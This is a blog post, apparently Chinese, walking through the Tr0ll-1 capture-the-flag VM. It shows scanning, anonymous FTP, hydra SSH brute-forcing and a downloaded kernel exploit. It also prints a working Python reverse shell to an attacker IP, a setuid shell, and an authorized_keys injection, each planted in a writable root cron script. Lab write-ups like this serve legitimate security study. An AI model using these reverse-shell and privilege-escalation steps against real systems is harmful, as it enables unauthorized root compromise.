Tr0ll-1
本文最后更新于31 天前,其中的信息可能已经过时,如有错误请发送邮件到1334258945@qq.com

Tr0ll-1

查看靶机ip

直接ifconfig看看自己的

ifconfig


192.168.161段。
接着用nmap去找一下靶机所在的ip

nmap 192.168.161.0/24 -sP


所以我们的靶机ip是192.168.161.147

nmap枚举

查看靶机的所有端口

nmap -p- 192.168.161.147
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

发现了这三个端口。
查看这些端口的详细信息

nmap 192.168.161.147 -p- -sS -sV -A -T5


内容是这些

ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 09  2014 lol.pcap 

22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu)
| http-robots.txt: 1 disallowed entry 
|_/secret

发现ftp存在lol.pcap流量文件,还有FTP带有匿名登录名:Anonymous FTP login allowed,80http存在robots.txt和/secret目录文件

登录FTP枚举

登陆ftp

ftp 192.168.161.147

账号密码都是Anonymous


登陆成功。
查看文件目录

dir


存在lol.pcap流量包。
提取出来

get lol.pcap


提取成功,exit退出就行。

wireshark分析流量

用wireshark进行分析

wireshark lol.pcap


wireshark对流量界面右键->追踪流量->TCP流量
发现只有0-3。
先看1


第一个流显示了一个文件secret_stuff.txt
看第二个


发现了sup3rs3cr3tdirlol
第三个和第一个一样。

页面枚举

去看看80端口里面是什么样子。


在后面输入,我们在上面找到的两个文件。
先是/secret_stuff.txt


什么都没有。
在输入/sup3rs3cr3tdirlol


具有文件。
下载roflmao。
查看文件类型

file roflmao


是32位的ELF 二进制文件
用strings试一试

strings roflmao


发现了一个地址0x0856BF
试试网站能不能进去。


可以进来。

继续页面枚举

在这个地方看一看这两个文件夹都是有什么。
在good_luck里面发现了一个txt文件


这个应该是账号。
因为下一个文件夹写的是密码。密码里面写的是goodjob,这说明这个文件名就是密码。
文件名叫Pass.txt
把用户名保存下来。

hydra爆破

这里爆破ssh就行。

hydra -L user.txt -p Pass.txt 192.168.161.147 ssh


直接成功。
所以用户名是overflow
密码是Pass.txt

登录系统ssh

ssh overflow@192.168.161.147

密码是Pass.txt


登陆成功,进入tty

python -c 'import pty; pty.spawn("/bin/bash")'


看看版本

uname -a


Linux 4-Tr0ll 3.13.0还是ubuntu

进行提权

去kali的searchsploit看看有没有

searchsploit Linux ubuntu 3.13.0


发现了第一个可以用
下载下来。


看看脚本内容。


发现只需要gcc编译完直接运行就行。
开一个http服务,来把这个文件传上去

python -m http.server 8081

然后去服务器下载

wget http://192.168.161.142:8081/37292.c


接下来进行gcc

gcc 37292.c -o qjzhalx
./qjzhalx

得到flag

扩充打法

进行ssh连接

ssh overflow@192.168.161.147

密码是Pass.txt
进入tty

python -c 'import pty; pty.spawn("/bin/bash")'

进去之后过去不久,会断开连接


Broadcast Message from root@4-Tr
(somewhere) at 8:40 …
TIMES UP LOL!
Connection to 192.168.161.147 closed by remote host.
Connection to 192.168.161.147 closed.
它会自动结束ssh进程,而且还是整点提示!说明有计划任务在自动到点结束进程。每5分钟就被踢一次!
接下来看看是为什么

find / -name cronlog 2>/dev/null    ---查看计划任务日志信息


发现cleaner.py文件。

find / -name cleaner.py 2>/dev/null   ---查看文件在哪儿


在/lib/log/cleaner.py。
内容是

#!/usr/bin/env python
import os
import sys
try:
    os.system('rm -r /tmp/* ')
except:
    sys.exit()
  • 小技巧1
find / -writable 2>/dev/null   ---枚举所有可写入权限的文件
  • 小技巧2
ind / -perm -o+w -type f 2> /dev/null | grep /proc -v   ---枚举可以执行可以写入的文件

知道了计划任务和py脚本可写入,以及py的位置后,那么方法千万种,接下来我用三种

反弹shell

使用nano来改写这个cleaner.py的文件
需要改成什么样子呐
我们只需要把里面的内容全部删除,然后写入

#!/usr/bin/python
def con():
    import socket, time,pty, os
    host='192.168.161.142'
    port=9999
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.settimeout(10)
    s.connect((host,port))
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    os.putenv("HISTFILE",'/dev/null')
    pty.spawn("/bin/bash")
    s.close()
con()
nano /lib/log/cleaner.py

然后改写


然后输入CTRL X然后再输入y,最后回车
cat看一看。


千万别忘记再自己kali里面开个监护。

nc -vlp 9999


反弹成功。

创建root可执行程序,获得root权限

在原来的python文件里面改成这样就行

#!/usr/bin/env python
import os
import sys
try:
    os.system('cp /bin/sh /tmp/qjzhalx')
    os.system('chmod u+s /tmp/qjzhalx')
except:
    sys.exit()

改好了


接下来再开一个终端,进行ssh连接,然后去/tmp文件夹里面。
然后等待


成功了去拿flag

写入ssh rsa,ssh登录root用户

输入

ssh-keygen   --全部都空格回车


然后接着输入

cd ~/.ssh
cat id_rsa.pub   --这里的rsa是你自己的

这里我们需要把他加入到py脚本中

mkdir /root/.ssh; chmod 775 .ssh; echo "加上 id_rsa.pub产生的密匙内容上图有例子" >> /root/.ssh/authorized_keys

继续去改那个py文件,这次改成。

#!/usr/bin/env python
import os
import sys
try:
    os.system('mkdir /root/.ssh; chmod 775 .ssh; echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIH0l032W5fnhO3obB/PAvJextRxTAxGtgwsdteHJ3/Hd root@kali" >> /root/.ssh/authorized_keys')
except:
    sys.exit()


再去开一个终端,ssh用root登录

ssh root@192.168.161.147

等待,等到不输入密码就能进入的时候


成功了,拿flag去喽。

文末附加内容
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇